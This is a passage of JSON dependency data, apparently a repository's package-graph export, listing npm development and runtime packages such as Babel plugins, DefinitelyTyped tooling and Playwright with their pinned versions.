t":false,"kind":"development","optional":false},{"id":93892441,"package_name":"json5","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":93892442,"package_name":"semver","ecosystem":"npm","requirements":"6.3.0","direct":false,"kind":"development","optional":false},{"id":93892443,"package_name":"source-map","ecosystem":"npm","requirements":"0.5.7","direct":false,"kind":"development","optional":false},{"id":93892444,"package_name":"@babel/generator","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892445,"package_name":"jsesc","ecosystem":"npm","requirements":"2.5.2","direct":false,"kind":"development","optional":false},{"id":93892446,"package_name":"@babel/helper-annotate-as-pure","ecosystem":"npm","requirements":"7.16.0","direct":false,"kind":"development","optional":false},{"id":93892447,"package_name":"@babel/helper-compilation-targets","ecosystem":"npm","requirements":"7.16.3","direct":false,"kind":"development","optional":false},{"id":93892448,"package_name":"@babel/helper-create-class-features-plugin","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892449,"package_name":"@babel/helper-environment-visitor","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892450,"package_name":"@babel/helper-function-name","ecosystem":"npm","requirements":"7.16.0","direct":false,"kind":"development","optional":false},{"id":93892451,"package_name":"@babel/helper-get-function-arity","ecosystem":"npm","requirements":"7.16.0","direct":false,"kind":"development","optional":false},{"id":93892452,"package_name":"@babel/helper-hoist-variables","ecosystem":"npm","requirements":"7.16.0","direct":false,"kind":"development","optional":false},{"id":93892453,"package_name":"@babel/helper-member-expression-to-functions","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892454,"package_name":"@babel/helper-module-imports","ecosystem":"npm","requirements":"7.16.0","direct":false,"kind":"development","optional":false},{"id":93892455,"package_name":"@babel/helper-module-transforms","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892456,"package_name":"@babel/helper-optimise-call-expression","ecosystem":"npm","requirements":"7.16.0","direct":false,"kind":"development","optional":false},{"id":93892457,"package_name":"@babel/helper-plugin-utils","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892458,"package_name":"@babel/helper-replace-supers","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892459,"package_name":"@babel/helper-simple-access","ecosystem":"npm","requirements":"7.16.0","direct":false,"kind":"development","optional":false},{"id":93892460,"package_name":"@babel/helper-skip-transparent-expression-wrappers","ecosystem":"npm","requirements":"7.16.0","direct":false,"kind":"development","optional":false},{"id":93892461,"package_name":"@babel/helper-split-export-declaration","ecosystem":"npm","requirements":"7.16.0","direct":false,"kind":"development","optional":false},{"id":93892462,"package_name":"@babel/helper-validator-identifier","ecosystem":"npm","requirements":"7.15.7","direct":false,"kind":"development","optional":false},{"id":93892463,"package_name":"@babel/helper-validator-option","ecosystem":"npm","requirements":"7.14.5","direct":false,"kind":"development","optional":false},{"id":93892464,"package_name":"@babel/helpers","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892465,"package_name":"@babel/highlight","ecosystem":"npm","requirements":"7.16.0","direct":false,"kind":"development","optional":false},{"id":93892466,"package_name":"js-tokens","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93892467,"package_name":"@babel/parser","ecosystem":"npm","requirements":"7.16.6","direct":false,"kind":"development","optional":false},{"id":93892468,"package_name":"@babel/plugin-proposal-class-properties","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892469,"package_name":"@babel/plugin-proposal-dynamic-import","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892470,"package_name":"@babel/plugin-proposal-export-namespace-from","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892471,"package_name":"@babel/plugin-proposal-logical-assignment-operators","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892472,"package_name":"@babel/plugin-proposal-nullish-coalescing-operator","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892473,"package_name":"@babel/plugin-proposal-numeric-separator","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892474,"package_name":"@babel/plugin-proposal-optional-chaining","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892475,"package_name":"@babel/plugin-proposal-private-methods","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892476,"package_name":"@babel/plugin-proposal-private-property-in-object","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892477,"package_name":"@babel/plugin-syntax-async-generators","ecosystem":"npm","requirements":"7.8.4","direct":false,"kind":"development","optional":false},{"id":93892478,"package_name":"@babel/plugin-syntax-dynamic-import","ecosystem":"npm","requirements":"7.8.3","direct":false,"kind":"development","optional":false},{"id":93892479,"package_name":"@babel/plugin-syntax-export-namespace-from","ecosystem":"npm","requirements":"7.8.3","direct":false,"kind":"development","optional":false},{"id":93892480,"package_name":"@babel/plugin-syntax-json-strings","ecosystem":"npm","requirements":"7.8.3","direct":false,"kind":"development","optional":false},{"id":93892481,"package_name":"@babel/plugin-syntax-logical-assignment-operators","ecosystem":"npm","requirements":"7.10.4","direct":false,"kind":"development","optional":false},{"id":93892482,"package_name":"@babel/plugin-syntax-nullish-coalescing-operator","ecosystem":"npm","requirements":"7.8.3","direct":false,"kind":"development","optional":false},{"id":93892483,"package_name":"@babel/plugin-syntax-numeric-separator","ecosystem":"npm","requirements":"7.10.4","direct":false,"kind":"development","optional":false},{"id":93892484,"package_name":"@babel/plugin-syntax-object-rest-spread","ecosystem":"npm","requirements":"7.8.3","direct":false,"kind":"development","optional":false},{"id":93892485,"package_name":"@babel/plugin-syntax-optional-catch-binding","ecosystem":"npm","requirements":"7.8.3","direct":false,"kind":"development","optional":false},{"id":93892486,"package_name":"@babel/plugin-syntax-optional-chaining","ecosystem":"npm","requirements":"7.8.3","direct":false,"kind":"development","optional":false},{"id":93892487,"package_name":"@babel/plugin-syntax-private-property-in-object","ecosystem":"npm","requirements":"7.14.5","direct":false,"kind":"development","optional":false},{"id":93892488,"package_name":"@babel/plugin-syntax-typescript","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892489,"package_name":"@babel/plugin-transform-modules-commonjs","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892490,"package_name":"@babel/plugin-transform-typescript","ecosystem":"npm","requirements":"7.16.1","direct":false,"kind":"development","optional":false},{"id":93892491,"package_name":"@babel/preset-typescript","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892492,"package_name":"@babel/template","ecosystem":"npm","requirements":"7.16.0","direct":false,"kind":"development","optional":false},{"id":93892493,"package_name":"@babel/traverse","ecosystem":"npm","requirements":"7.16.5","direct":false,"kind":"development","optional":false},{"id":93892494,"package_name":"debug","ecosystem":"npm","requirements":"4.1.1","direct":false,"kind":"development","optional":false},{"id":93892495,"package_name":"globals","ecosystem":"npm","requirements":"11.12.0","direct":false,"kind":"development","optional":false},{"id":93892496,"package_name":"@babel/types","ecosystem":"npm","requirements":"7.16.0","direct":false,"kind":"development","optional":false},{"id":93892497,"package_name":"to-fast-properties","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892498,"package_name":"@definitelytyped/dts-critic","ecosystem":"npm","requirements":"0.0.100","direct":false,"kind":"development","optional":false},{"id":93892499,"package_name":"cliui","ecosystem":"npm","requirements":"6.0.0","direct":false,"kind":"development","optional":false},{"id":93892500,"package_name":"glob","ecosystem":"npm","requirements":"7.2.0","direct":false,"kind":"development","optional":false},{"id":93892501,"package_name":"rimraf","ecosystem":"npm","requirements":"3.0.2","direct":false,"kind":"development","optional":false},{"id":93892502,"package_name":"tmp","ecosystem":"npm","requirements":"0.2.1","direct":false,"kind":"development","optional":false},{"id":93892503,"package_name":"wrap-ansi","ecosystem":"npm","requirements":"6.2.0","direct":false,"kind":"development","optional":false},{"id":93892504,"package_name":"yargs","ecosystem":"npm","requirements":"15.4.1","direct":false,"kind":"development","optional":false},{"id":93892505,"package_name":"yargs-parser","ecosystem":"npm","requirements":"18.1.3","direct":false,"kind":"development","optional":false},{"id":93892506,"package_name":"@definitelytyped/dtslint","ecosystem":"npm","requirements":"0.0.100","direct":false,"kind":"development","optional":false},{"id":93892507,"package_name":"diff","ecosystem":"npm","requirements":"3.5.0","direct":false,"kind":"development","optional":false},{"id":93892508,"package_name":"fs-extra","ecosystem":"npm","requirements":"6.0.1","direct":false,"kind":"development","optional":false},{"id":93892509,"package_name":"tslint","ecosystem":"npm","requirements":"5.14.0","direct":false,"kind":"development","optional":false},{"id":93892510,"package_name":"@definitelytyped/header-parser","ecosystem":"npm","requirements":"0.0.93","direct":false,"kind":"development","optional":false},{"id":93892511,"package_name":"@definitelytyped/typescript-versions","ecosystem":"npm","requirements":"0.0.93","direct":false,"kind":"development","optional":false},{"id":93892512,"package_name":"@definitelytyped/utils","ecosystem":"npm","requirements":"0.0.93","direct":false,"kind":"development","optional":false},{"id":93892513,"package_name":"@handlebars/parser","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"runtime","optional":false},{"id":93892514,"package_name":"@jest/types","ecosystem":"npm","requirements":"27.4.2","direct":false,"kind":"development","optional":false},{"id":93892515,"package_name":"chalk","ecosystem":"npm","requirements":"4.1.2","direct":false,"kind":"development","optional":false},{"id":93892516,"package_name":"has-flag","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93892517,"package_name":"supports-color","ecosystem":"npm","requirements":"7.2.0","direct":false,"kind":"development","optional":false},{"id":93892518,"package_name":"@mdn/browser-compat-data","ecosystem":"npm","requirements":"3.3.14","direct":false,"kind":"development","optional":false},{"id":93892519,"package_name":"@nodelib/fs.scandir","ecosystem":"npm","requirements":"2.1.3","direct":false,"kind":"development","optional":false},{"id":93892520,"package_name":"@nodelib/fs.stat","ecosystem":"npm","requirements":"2.0.3","direct":false,"kind":"development","optional":false},{"id":93892521,"package_name":"@nodelib/fs.walk","ecosystem":"npm","requirements":"1.2.4","direct":false,"kind":"development","optional":false},{"id":93892522,"package_name":"@playwright/test","ecosystem":"npm","requirements":"1.17.1","direct":false,"kind":"development","optional":false},{"id":93892523,"package_name":"colors","ecosystem":"npm","requirements":"1.4.0","direct":false,"kind":"development","optional":false},{"id":93892524,"package_name":"commander","ecosystem":"npm","requirements":"8.3.0","direct":false,"kind":"development","optional":false},{"id":93892525,"package_name":"mime","ecosystem":"npm","requirements":"2.6.0","direct":false,"kind":"development","optional":false},{"id":93892526,"package_name":"open","ecosystem":"npm","requirements":"8.4.0","direct":false,"kind":"development","optional":false},{"id":93892527,"package_name":"source-map-support","ecosystem":"npm","requirements":"0.4.18","direct":false,"kind":"development","optional":false},{"id":93892528,"package_name":"@qiwi/npm-registry-client","ecosystem":"npm","requirements":"8.9.1","direct":false,"kind":"development","optional":false},{"id":93892529,"package_name":"concat-stream","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892530,"package_name":"readable-stream","ecosystem":"npm","requirements":"3.6.0","direct":false,"kind":"development","optional":false},{"id":93892531,"package_name":"@samverschueren/stream-to-observable","ecosystem":"npm","requirements":"0.3.0","direct":false,"kind":"development","optional":false},{"id":93892532,"package_name":"@sinonjs/commons","ecosystem":"npm","requirements":"1.7.1","direct":false,"kind":"development","optional":false},{"id":93892533,"package_name":"@sinonjs/formatio","ecosystem":"npm","requirements":"3.2.2","direct":false,"kind":"development","optional":false},{"id":93892534,"package_name":"@sinonjs/samsam","ecosystem":"npm","requirements":"3.3.3","direct":false,"kind":"development","optional":false},{"id":93892535,"package_name":"@sinonjs/text-encoding","ecosystem":"npm","requirements":"0.7.1","direct":false,"kind":"development","optional":false},{"id":93892536,"package_name":"@types/color-name","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"runtime","optional":false},{"id":93892537,"package_name":"@types/events","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93892538,"package_name":"@types/glob","ecosystem":"npm","requirements":"7.1.1","direct":false,"kind":"development","optional":false},{"id":93892539,"package_name":"@types/istanbul-lib-coverage","ecosystem":"npm","requirements":"2.0.4","direct":false,"kind":"development","optional":false},{"id":93892540,"package_name":"@types/istanbul-lib-report","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93892541,"package_name":"@types/istanbul-reports","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":93892542,"package_name":"@types/minimatch","ecosystem":"npm","requirements":"3.0.3","direct":false,"kind":"development","optional":false},{"id":93892543,"package_name":"@types/node","ecosystem":"npm","requirements":"14.18.3","direct":false,"kind":"development","optional":false},{"id":93892544,"package_name":"@types/normalize-package-data","ecosystem":"npm","requirements":"2.4.0","direct":false,"kind":"development","optional":false},{"id":93892545,"package_name":"@types/parsimmon","ecosystem":"npm","requirements":"1.10.1","direct":false,"kind":"development","optional":false},{"id":93892546,"package_name":"@types/stack-utils","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93892547,"package_name":"@types/yargs","ecosystem":"npm","requirements":"16.0.4","direct":false,"kind":"development","optional":false},{"id":93892548,"package_name":"@types/yargs-parser","ecosystem":"npm","requirements":"20.2.1","direct":false,"kind":"development","optional":false},{"id":93892549,"package_name":"@types/yauzl","ecosystem":"npm","requirements":"2.9.2","direct":false,"kind":"development","optional":false},{"id":93892550,"package_name":"abbrev","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93892551,"package_name":"accepts","ecosystem":"npm","requirements":"1.3.7","direct":false,"kind":"development","optional":false},{"id":93892552,"package_name":"acorn","ecosystem":"npm","requirements":"7.4.1","direct":false,"kind":"development","optional":false},{"id":93892553,"package_name":"acorn-jsx","ecosystem":"npm","requirements":"5.2.0","direct":false,"kind":"development","optional":false},{"id":93892554,"package_name":"aggregate-error","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":93892555,"package_name":"indent-string","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93892556,"package_name":"ajv","ecosystem":"npm","requirements":"6.12.6","direct":false,"kind":"development","optional":false},{"id":93892557,"package_name":"align-text","ecosystem":"npm","requirements":"0.1.4","direct":false,"kind":"development","optional":false},{"id":93892558,"package_name":"alter","ecosystem":"npm","requirements":"0.2.0","direct":false,"kind":"development","optional":false},{"id":93892559,"package_name":"amdefine","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892560,"package_name":"ansi-escapes","ecosystem":"npm","requirements":"4.3.1","direct":false,"kind":"development","optional":false},{"id":93892561,"package_name":"type-fest","ecosystem":"npm","requirements":"0.11.0","direct":false,"kind":"development","optional":false},{"id":93892562,"package_name":"ansi-regex","ecosystem":"npm","requirements":"5.0.1","direct":false,"kind":"runtime","optional":false},{"id":93892563,"package_name":"ansi-styles","ecosystem":"npm","requirements":"4.2.1","direct":false,"kind":"runtime","optional":false},{"id":93892564,"package_name":"any-observable","ecosystem":"npm","requirements":"0.3.0","direct":false,"kind":"development","optional":false},{"id":93892565,"package_name":"anymatch","ecosystem":"npm","requirements":"1.3.2","direct":false,"kind":"development","optional":false},{"id":93892566,"package_name":"append-transform","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892567,"package_name":"aproba","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":93892568,"package_name":"archy","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892569,"package_name":"are-we-there-yet","ecosystem":"npm","requirements":"1.1.7","direct":false,"kind":"development","optional":false},{"id":93892570,"package_name":"argparse","ecosystem":"npm","requirements":"1.0.10","direct":false,"kind":"development","optional":false},{"id":93892571,"package_name":"arr-diff","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892572,"package_name":"arr-flatten","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93892573,"package_name":"arr-union","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":93892574,"package_name":"array-each","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892575,"package_name":"array-find-index","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892576,"package_name":"array-flatten","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93892577,"package_name":"array-from","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":93892578,"package_name":"array-slice","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93892579,"package_name":"array-union","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93892580,"package_name":"array-unique","ecosystem":"npm","requirements":"0.2.1","direct":false,"kind":"development","optional":false},{"id":93892581,"package_name":"asn1","ecosystem":"npm","requirements":"0.2.4","direct":false,"kind":"development","optional":false},{"id":93892582,"package_name":"assert","ecosystem":"npm","requirements":"1.5.0","direct":false,"kind":"development","optional":false},{"id":93892583,"package_name":"inherits","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93892584,"package_name":"object-assign","ecosystem":"npm","requirements":"4.1.1","direct":false,"kind":"development","optional":false},{"id":93892585,"package_name":"util","ecosystem":"npm","requirements":"0.10.3","direct":false,"kind":"development","optional":false},{"id":93892586,"package_name":"assert-plus","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892587,"package_name":"assertion-error","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93892588,"package_name":"assign-symbols","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892589,"package_name":"ast-metadata-inferer","ecosystem":"npm","requirements":"0.7.0","direct":false,"kind":"development","optional":false},{"id":93892590,"package_name":"ast-traverse","ecosystem":"npm","requirements":"0.1.1","direct":false,"kind":"development","optional":false},{"id":93892591,"package_name":"ast-types","ecosystem":"npm","requirements":"0.9.6","direct":false,"kind":"development","optional":false},{"id":93892592,"package_name":"astral-regex","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892593,"package_name":"async","ecosystem":"npm","requirements":"1.5.2","direct":false,"kind":"development","optional":false},{"id":93892594,"package_name":"async-each","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":93892595,"package_name":"asynckit","ecosystem":"npm","requirements":"0.4.0","direct":false,"kind":"development","optional":false},{"id":93892596,"package_name":"atob","ecosystem":"npm","requirements":"2.1.2","direct":false,"kind":"development","optional":false},{"id":93892597,"package_name":"aws-sdk","ecosystem":"npm","requirements":"2.1159.0","direct":false,"kind":"development","optional":false},{"id":93892598,"package_name":"uuid","ecosystem":"npm","requirements":"8.0.0","direct":false,"kind":"development","optional":false},{"id":93892599,"package_name":"aws-sign2","ecosystem":"npm","requirements":"0.7.0","direct":false,"kind":"development","optional":false},{"id":93892600,"package_name":"aws4","ecosystem":"npm","requirements":"1.9.1","direct":false,"kind":"development","optional":false},{"id":93892601,"package_name":"babel-code-frame","ecosystem":"npm","requirements":"6.26.0","direct":false,"kind":"development","optional":false},{"id":93892602,"package_name":"ansi-regex","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":93892603,"package_name":"ansi-styles","ecosystem":"npm","requirements":"2.2.1","direct":false,"kind":"development","optional":false},{"id":93892604,"package_name":"chalk","ecosystem":"npm","requirements":"1.1.3","direct":false,"kind":"development","optional":false},{"id":93892605,"package_name":"js-tokens","ecosystem":"npm","requirements":"3.0.2","direct":false,"kind":"development","optional":false},{"id":93892606,"package_name":"strip-ansi","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":93892607,"package_name":"supports-color","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892608,"package_name":"babel-core","ecosystem":"npm","requirements":"5.8.38","direct":false,"kind":"development","optional":false},{"id":93892609,"package_name":"debug","ecosystem":"npm","requirements":"2.6.9","direct":false,"kind":"development","optional":false},{"id":93892610,"package_name":"lodash","ecosystem":"npm","requirements":"3.10.1","direct":false,"kind":"development","optional":false},{"id":93892611,"package_name":"minimatch","ecosystem":"npm","requirements":"2.0.10","direct":false,"kind":"development","optional":false},{"id":93892612,"package_name":"ms","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892613,"package_name":"path-exists","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892614,"package_name":"babel-loader","ecosystem":"npm","requirements":"5.4.2","direct":false,"kind":"development","optional":false},{"id":93892615,"package_name":"babel-plugin-constant-folding","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892616,"package_name":"babel-plugin-dead-code-elimination","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892617,"package_name":"babel-plugin-dynamic-import-node","ecosystem":"npm","requirements":"2.3.3","direct":false,"kind":"development","optional":false},{"id":93892618,"package_name":"babel-plugin-eval","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892619,"package_name":"babel-plugin-inline-environment-variables","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892620,"package_name":"babel-plugin-jscript","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":93892621,"package_name":"babel-plugin-member-expression-literals","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892622,"package_name":"babel-plugin-property-literals","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892623,"package_name":"babel-plugin-proto-to-assign","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":93892624,"package_name":"babel-plugin-react-constant-elements","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":93892625,"package_name":"babel-plugin-react-display-name","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":93892626,"package_name":"babel-plugin-remove-console","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892627,"package_name":"babel-plugin-remove-debugger","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892628,"package_name":"babel-plugin-runtime","ecosystem":"npm","requirements":"1.0.7","direct":false,"kind":"development","optional":false},{"id":93892629,"package_name":"babel-plugin-undeclared-variables-check","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892630,"package_name":"babel-plugin-undefined-to-void","ecosystem":"npm","requirements":"1.1.6","direct":false,"kind":"development","optional":false},{"id":93892631,"package_name":"babel-runtime","ecosystem":"npm","requirements":"5.8.38","direct":false,"kind":"development","optional":false},{"id":93892632,"package_name":"babylon","ecosystem":"npm","requirements":"5.8.38","direct":false,"kind":"development","optional":false},{"id":93892633,"package_name":"balanced-match","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892634,"package_name":"base","ecosystem":"npm","requirements":"0.11.2","direct":false,"kind":"development","optional":false},{"id":93892635,"package_name":"define-property","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892636,"package_name":"is-accessor-descriptor","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892637,"package_name":"is-data-descriptor","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892638,"package_name":"is-descriptor","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892639,"package_name":"isobject","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":93892640,"package_name":"kind-of","ecosystem":"npm","requirements":"6.0.3","direct":false,"kind":"development","optional":false},{"id":93892641,"package_name":"base64-js","ecosystem":"npm","requirements":"1.3.1","direct":false,"kind":"development","optional":false},{"id":93892642,"package_name":"basic-auth","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93892643,"package_name":"safe-buffer","ecosystem":"npm","requirements":"5.1.2","direct":false,"kind":"development","optional":false},{"id":93892644,"package_name":"batch","ecosystem":"npm","requirements":"0.6.1","direct":false,"kind":"development","optional":false},{"id":93892645,"package_name":"bcrypt-pbkdf","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892646,"package_name":"benchmark","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892647,"package_name":"big.js","ecosystem":"npm","requirements":"3.2.0","direct":false,"kind":"development","optional":false},{"id":93892648,"package_name":"binary-extensions","ecosystem":"npm","requirements":"1.13.1","direct":false,"kind":"development","optional":false},{"id":93892649,"package_name":"bindings","ecosystem":"npm","requirements":"1.5.0","direct":false,"kind":"development","optional":false},{"id":93892650,"package_name":"bl","ecosystem":"npm","requirements":"4.1.0","direct":false,"kind":"development","optional":false},{"id":93892651,"package_name":"buffer","ecosystem":"npm","requirements":"5.7.1","direct":false,"kind":"development","optional":false},{"id":93892652,"package_name":"block-stream","ecosystem":"npm","requirements":"0.0.9","direct":false,"kind":"development","optional":false},{"id":93892653,"package_name":"bluebird","ecosystem":"npm","requirements":"2.11.0","direct":false,"kind":"development","optional":false},{"id":93892654,"package_name":"body","ecosystem":"npm","requirements":"5.1.0","direct":false,"kind":"development","optional":false},{"id":93892655,"package_name":"body-parser","ecosystem":"npm","requirements":"1.19.0","direct":false,"kind":"development","optional":false},{"id":93892656,"package_name":"bytes","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":93892657,"package_name":"http-errors","ecosystem":"npm","requirements":"1.7.2","direct":false,"kind":"development","optional":false},{"id":93892658,"package_name":"inherits","ecosystem":"npm","requirements":"2.0.3","direct":false,"kind":"development","optional":false},{"id":93892659,"package_name":"qs","ecosystem":"npm","requirements":"6.7.0","direct":false,"kind":"development","optional":false},{"id":93892660,"package_name":"raw-body","ecosystem":"npm","requirements":"2.4.0","direct":false,"kind":"development","optional":false},{"id":93892661,"package_name":"setprototypeof","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93892662,"package_name":"brace-expansion","ecosystem":"npm","requirements":"1.1.11","direct":false,"kind":"development","optional":false},{"id":93892663,"package_name":"braces","ecosystem":"npm","requirements":"1.8.5","direct":false,"kind":"development","optional":false},{"id":93892664,"package_name":"breakable","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892665,"package_name":"browser-stdout","ecosystem":"npm","requirements":"1.3.1","direct":false,"kind":"development","optional":false},{"id":93892666,"package_name":"browserify-aes","ecosystem":"npm","requirements":"0.4.0","direct":false,"kind":"development","optional":false},{"id":93892667,"package_name":"browserify-zlib","ecosystem":"npm","requirements":"0.1.4","direct":false,"kind":"development","optional":false},{"id":93892668,"package_name":"browserslist","ecosystem":"npm","requirements":"4.19.1","direct":false,"kind":"development","optional":false},{"id":93892669,"package_name":"buffer","ecosystem":"npm","requirements":"4.9.2","direct":false,"kind":"development","optional":false},{"id":93892670,"package_name":"buffer-crc32","ecosystem":"npm","requirements":"0.2.13","direct":false,"kind":"development","optional":false},{"id":93892671,"package_name":"buffer-from","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93892672,"package_name":"builtin-modules","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93892673,"package_name":"builtin-status-codes","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93892674,"package_name":"builtins","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":93892675,"package_name":"bytes","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892676,"package_name":"cache-base","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892677,"package_name":"caching-transform","ecosystem":"npm","requirements":"3.0.2","direct":false,"kind":"development","optional":false},{"id":93892678,"package_name":"call-bind","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892679,"package_name":"caller-callsite","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892680,"package_name":"callsites","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892681,"package_name":"caller-path","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892682,"package_name":"callsites","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":93892683,"package_name":"camelcase","ecosystem":"npm","requirements":"5.3.1","direct":false,"kind":"development","optional":false},{"id":93892684,"package_name":"camelcase-keys","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93892685,"package_name":"camelcase","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":93892686,"package_name":"caniuse-lite","ecosystem":"npm","requirements":"1.0.30001294","direct":false,"kind":"development","optional":false},{"id":93892687,"package_name":"caseless","ecosystem":"npm","requirements":"0.12.0","direct":false,"kind":"development","optional":false},{"id":93892688,"package_name":"center-align","ecosystem":"npm